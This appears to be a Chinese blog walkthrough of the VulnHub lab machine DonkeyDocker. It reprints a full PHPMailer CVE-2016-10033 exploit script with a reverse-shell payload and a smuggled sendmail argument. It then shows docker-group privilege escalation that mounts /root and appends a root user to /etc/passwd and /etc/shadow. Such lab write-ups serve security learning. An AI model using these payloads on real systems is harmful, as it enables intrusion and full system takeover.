DonkeyDocker-v1-0渗透思路

MY_BLOG

https://xyaxxya.github.io/2024/04/13/DonkeyDocker-v1-0%E6%B8%97%E9%80%8F%E6%80%9D%E8%B7%AF/

---

date: 2024-04-13 19:15:10
tags:

• 内网渗透
• Dockerfile

categories:

• • 内网渗透
  • vulnhub

---

靶机下载地址

https://www.vulnhub.com/entry/donkeydocker-1,189/

靶机IP：

192.168.100.134
1

查看端口，扫描目录

查看页面

刚才用的是

feroxbuster -u http://192.168.100.134
1

不太给力，换个字典再看看

+ http://192.168.100.134/mailer/extras/admin.php (CODE:301|SIZE:331)
+ http://192.168.100.134/mailer/extras/index.php (CODE:301|SIZE:331)
+ http://192.168.100.134/mailer/extras/info.php (CODE:301|SIZE:330)
+ http://192.168.100.134/mailer/extras/phpinfo.php (CODE:301|SIZE:333)
+ http://192.168.100.134/mailer/extras/xmlrpc.php (CODE:301|SIZE:332)
+ http://192.168.100.134/mailer/extras/xmlrpc_server.php (CODE:301|SIZE:339)

---- Entering directory: http://192.168.100.134/mailer/language/ ----
+ http://192.168.100.134/mailer/language/admin.php (CODE:301|SIZE:333)
+ http://192.168.100.134/mailer/language/index.php (CODE:301|SIZE:333)
+ http://192.168.100.134/mailer/language/info.php (CODE:301|SIZE:332)
+ http://192.168.100.134/mailer/language/phpinfo.php (CODE:301|SIZE:335)
+ http://192.168.100.134/mailer/language/xmlrpc.php (CODE:301|SIZE:334)
+ http://192.168.100.134/mailer/language/xmlrpc_server.php (CODE:301|SIZE:341)

---- Entering directory: http://192.168.100.134/mailer/test/ ----
+ http://192.168.100.134/mailer/test/admin.php (CODE:301|SIZE:329)
+ http://192.168.100.134/mailer/test/index.php (CODE:301|SIZE:329)
+ http://192.168.100.134/mailer/test/info.php (CODE:301|SIZE:328)
+ http://192.168.100.134/mailer/test/phpinfo.php (CODE:301|SIZE:331)
+ http://192.168.100.134/mailer/test/xmlrpc.php (CODE:301|SIZE:330)
+ http://192.168.100.134/mailer/test/xmlrpc_server.php (CODE:301|SIZE:337)

---- Entering directory: http://192.168.100.134/mailer/examples/images/ ----
+ http://192.168.100.134/mailer/examples/images/admin.php (CODE:301|SIZE:340)
+ http://192.168.100.134/mailer/examples/images/index.php (CODE:301|SIZE:340)
+ http://192.168.100.134/mailer/examples/images/info.php (CODE:301|SIZE:339)
+ http://192.168.100.134/mailer/examples/images/phpinfo.php (CODE:301|SIZE:342)
+ http://192.168.100.134/mailer/examples/images/xmlrpc.php (CODE:301|SIZE:341)
+ http://192.168.100.134/mailer/examples/images/xmlrpc_server.php (CODE:301|SIZE:348)

---- Entering directory: http://192.168.100.134/mailer/examples/scripts/ ----
+ http://192.168.100.134/mailer/examples/scripts/admin.php (CODE:301|SIZE:341)
+ http://192.168.100.134/mailer/examples/scripts/index.php (CODE:301|SIZE:341)
+ http://192.168.100.134/mailer/examples/scripts/info.php (CODE:301|SIZE:340)
+ http://192.168.100.134/mailer/examples/scripts/phpinfo.php (CODE:301|SIZE:343)
+ http://192.168.100.134/mailer/examples/scripts/xmlrpc.php (CODE:301|SIZE:342)
+ http://192.168.100.134/mailer/examples/scripts/xmlrpc_server.php (CODE:301|SIZE:349)

---- Entering directory: http://192.168.100.134/mailer/examples/styles/ ----
+ http://192.168.100.134/mailer/examples/styles/admin.php (CODE:301|SIZE:340)
+ http://192.168.100.134/mailer/examples/styles/index.php (CODE:301|SIZE:340)
+ http://192.168.100.134/mailer/examples/styles/info.php (CODE:301|SIZE:339)
+ http://192.168.100.134/mailer/examples/styles/phpinfo.php (CODE:301|SIZE:342)
+ http://192.168.100.134/mailer/examples/styles/xmlrpc.php (CODE:301|SIZE:341)
+ http://192.168.100.134/mailer/examples/styles/xmlrpc_server.php (CODE:301|SIZE:348)

-----------------
END_TIME: Sat Apr 13 07:32:54 2024
DOWNLOADED: 73792 - FOUND: 103

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51

选择http://192.168.100.134/mailer/examples/登录

登录http://192.168.100.134/mailer/examples/查看

google一下发现http://192.168.100.134/mailer/VERSION可以查询版本

google一下

https://exploit-db.com/exploits/40974

”“”
# 漏洞标题：PHPMailer 漏洞 v1.0
# 日期：2016 年 12 月 29 日
# 利用作者：Daniel aka anarc0der
# 版本：PHPMailer < 5.2.18
# 测试环境：Arch Linux
# CVE：CVE 2016-10033

描述：
通过目标的反向连接（反向 shell）来利用 PHPMail

用法：
1 - 下载 docker 易受攻击的环境：https://github.com/opsxcq/exploit-CVE-2016-10033
2 - 在有效负载变量上配置反向 shell 的 IP
4 - 在一个终端中打开 nc 监听器： $ nc -lnvp <your ip>
3 - 打开其他终端并运行漏洞利用程序：python3 anarcoder.py

视频 PoC：https://www.youtube.com/watch?v=DXeZxKr-qsU

完整咨询：
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

下载代码后修改：

1. 打开文件并在开头添加“ #coding:utf-8 ”。
2. 设置target = ‘http://192.168.100.134’ （受害者IP），这是backdoor.php在受害者机器中自动上传的位置。
3. 在有效负载代码中提供攻击者 IP：192.168.100.251（Kali Linux IP）
4. 进行上述更改后保存。

然后pip2 install requests_toolbelt

一边监听一边运行即可

或者msf里也有脚本

msf6 > searchsploit phpmail
[*] exec: searchsploit phpmail

-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
PHPMailer 1.7 - 'Data()' Remote Denial of Service                                                                                     | php/dos/25752.txt
PHPMailer < 5.2.18 - Remote Code Execution                                                                                            | php/webapps/40968.sh
PHPMailer < 5.2.18 - Remote Code Execution                                                                                            | php/webapps/40970.php
PHPMailer < 5.2.18 - Remote Code Execution                                                                                            | php/webapps/40974.py
PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit)                                                                         | multiple/webapps/41688.rb
PHPMailer < 5.2.20 - Remote Code Execution                                                                                            | php/webapps/40969.py
PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Execution        | php/webapps/40986.py
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution                                                                              | php/webapps/42221.py
PHPMailer < 5.2.21 - Local File Disclosure                                                                                            | php/webapps/43056.py
WordPress Plugin PHPMailer 4.6 - Host Header Command Injection (Metasploit)                                                           | php/remote/42024.rb
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

下载到当前页面

#coding:utf-8
"""
# Exploit Title: PHPMailer Exploit v1.0
# Date: 29/12/2016
# Exploit Author: Daniel aka anarc0der
# Version: PHPMailer < 5.2.18
# Tested on: Arch Linux
# CVE : CVE 2016-10033

Description:
Exploiting PHPMail with back connection (reverse shell) from the target

Usage:
1 - Download docker vulnerable enviroment at: https://github.com/opsxcq/exploit-CVE-2016-10033
2 - Config your IP for reverse shell on payload variable
4 - Open nc listener in one terminal: $ nc -lnvp <your ip>
3 - Open other terminal and run the exploit: python3 anarcoder.py

Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU

Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""

from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh

os.system('clear')
print("\n")
print(" █████╗ ███╗   ██╗ █████╗ ██████╗  ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║     ██║   ██║██║  ██║█████╗  ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║     ██║   ██║██║  ██║██╔══╝  ██╔══██╗")
print("██║  ██║██║ ╚████║██║  ██║██║  ██║╚██████╗╚██████╔╝██████╔╝███████╗██║  ██║")
print("╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝  ╚═╝")
print("      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")

target = 'http://192.168.100.134'
backdoor = '/test.php'

payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'192.168.100.251\\\',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'
fields={'action': 'submit',
        'name': payload,
        'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/www/test.php server\" @protonmail.com',
        'message': 'Pwned'}

m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')

headers={'User-Agent': 'curl/7.47.0',
         'Content-Type': m.content_type}

proxies = {'http': '192.168.100.251', 'https':'192.168.100.251'}


print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target, data=m.to_string(),
                  headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
    print('[+]  ExPLoITeD ' + target)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66

实验后发现target中不需要添加contact界面，这样添加的webshell就会在IP/backdoor.php

至于proxy需不需要修改，我没试过

test是我自己测试用的

运行后访问backdoor.php即可反弹shell

/bin/sh: 0: can't access tty; job control turned off
1

返回netcat shell，在这里会发现它已连接到受害者，但无法访问受害者系统的正确 shell，因此，输入给定的命令以便正确访问受害者 shell

python升级shell

python -c 'import pty;pty.spawn("/bin/bash")'
1

先看看有suid权限的

没什么收获

在根目录发现main.sh

# Start apache
source /etc/apache2/envvars
a2enmod rewrite
apachectl -f /etc/apache2/apache2.conf

sleep 3
tail -f /var/log/apache2/*&

# Start our fake smtp server
python -m smtpd -n -c DebuggingServer localhost:25
1
2
3
4
5
6
7
8
9
10

www-data@12081bd067cc:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
smmta:x:104:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:105:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
smith:x:1000:100::/home/smith:/bin/bash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

发现Smith，尝试登录，弱口令进了

用户目录发现一个flag

似乎是指向orwell@donkeydocker 的私钥。

复制到id_rsa登录

详见https://wangdoc.com/ssh/key

chmod 600 id_rsa
ssh -i id_rsa orwell@192.168.100.134 
1
2

获得第二个flag

属于docker组，列出所有容器。这下知道main.sh的作用了吧

#!/bin/bash

# change permission
chown smith:users /home/smith/flag.txt

# Start apache
source /etc/apache2/envvars
a2enmod rewrite
apachectl -f /etc/apache2/apache2.conf

sleep 3
tail -f /var/log/apache2/*&

# Start our fake smtp server
python -m smtpd -n -c DebuggingServer localhost:25

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

法一：

docker run -v /root:/hack -t debian:jessie /bin/sh -c 'ls -al /hack'
docker run -v /root:/hack -t debian:jessie /bin/sh -c 'cat /hack/flag.txt'
1
2

简单的说就是新建了一个debian容器，其中的hack目录映射到本地的root目录，-c后面跟随的字符串是要在 Shell 中执行的命令。

debian 是镜像的名称，jessie 是 Debian 发行版的一个老版本的代号，作为镜像的标签，Docker 将使用这个镜像来创建容器。

法二（no flag）

我们在shell端创建一个软连接到/etc/psswd

cd /home/smith
mv flag.txt flag.txt.bak
ln -s /etc/passwd flag.txt
1
2
3

ssh端重启docker

会杀死原来的会话，重新创建即可

创建root用户即可

www-data@12081bd067cc:/www$ echo 'yiyi:x:0:0::/root:/bin/bash' >> flag.txt
echo 'yiyi:x:0:0::/root:/bin/bash' >> flag.txt
1
2

同样的操作对shadow

rm flag.txt
ln -s /etc/shadow flag.txt
1
2

重启docker

echo 'reedphish:R2JhrPXIXqW3g:17251:0:99999:7:::' >> flag.txt
1

su yiyi
ls -al /root
1
2

密码smith

登录后发现找不到flag！

法三

类法一

创建一个hack目录，在里面写dockerfile

touch Dockerfile
1

Dockerfile内容

FROM alpine:3.3 
# Alpine is nice! 
ENV WORKDIR /hack
RUN mkdir -p $WORKDIR
VOLUME [$WORKDIR]
WORKDIR $WORKDIR
1
2
3
4
5
6

构建

docker build -t hackerimage .
1

docker run -v /root:/hack -t hackerimage /bin/sh -c 'ls -la'
docker run -v /root:/hack -t hackerimage /bin/sh -c 'cat flag.txt'
1
2

完